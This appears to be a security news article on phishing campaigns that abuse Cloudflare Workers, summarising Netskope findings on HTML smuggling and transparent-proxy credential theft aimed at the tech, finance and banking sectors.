Cloudflare workers have become the latest target for phishing campaigns, with attackers using two main tactics to exploit this cloud-based service. One method involves injecting malicious content hidden by HTML smuggling, similar to the Azorult malware, while the other utilizes Cloudflare workers as a transparent proxy to steal login credentials for popular services like Microsoft, Gmail, and Yahoo Mail. These attacks are primarily aimed at users in Asia, North America, and Southern Europe, particularly those in the tech, finance, and banking sectors.

The increasing number of domains and applications hosting these malicious activities indicates a persistent effort by cybercriminals to avoid detection and takedowns. This trend underscores the ongoing practice of exploiting free cloud services for phishing purposes and highlights the effectiveness of targeting well-known cloud platforms like Cloudflare.

One of the primary techniques used by attackers is hosting phishing sites on Cloudflare workers. This allows them to create custom malicious applications with custom domains under the workers.dev subdomain and distribute them freely. Despite the stabilization of overall traffic volume, the proliferation of distinct malicious applications hosted on Cloudflare workers continues to grow, signaling a troubling trend in attackers’ tactics.

HTML smuggling is another method employed by cybercriminals to bypass network defenses and deliver phishing pages to unsuspecting users. Malicious code is concealed within a seemingly harmless webpage as a base64-encoded blob, further obscured through multiple encodings. By using the createObjectURL() method, attackers can make the hidden phishing page accessible within the endpoint and simulate a click on the blob URL to display the phishing page in the victim’s browser.

Additionally, attackers are employing a new technique known as transparent phishing, which allows them to bypass traditional limitations by creating a server that acts as a middleman between the victim and the legitimate login page. The victim sees the real login page but unknowingly submits their credentials to the attacker’s server, which then forwards them to the legitimate service. This method enables attackers to capture tokens and cookies from the legitimate site’s response, granting them visibility into the victim’s subsequent online activity.

Researchers at Netskope have analyzed these attacks and discovered that they are built on modified open-source MITM toolkits and leverage Cloudflare workers’ “Hello World” template to intercept victim requests. The attacker’s application acts as a transparent proxy, intercepting and manipulating traffic between the victim and the legitimate site to steal login credentials and other sensitive information.

In conclusion, the abuse of Cloudflare workers in phishing campaigns represents a serious threat to users, particularly those in the tech, finance, and banking sectors. By exploiting the functionalities of this cloud-based service, attackers can launch sophisticated attacks that evade detection and compromise the security of unsuspecting individuals. It is essential for organizations and users to be vigilant against such threats and implement robust security measures to mitigate the risks posed by these malicious activities.

Source link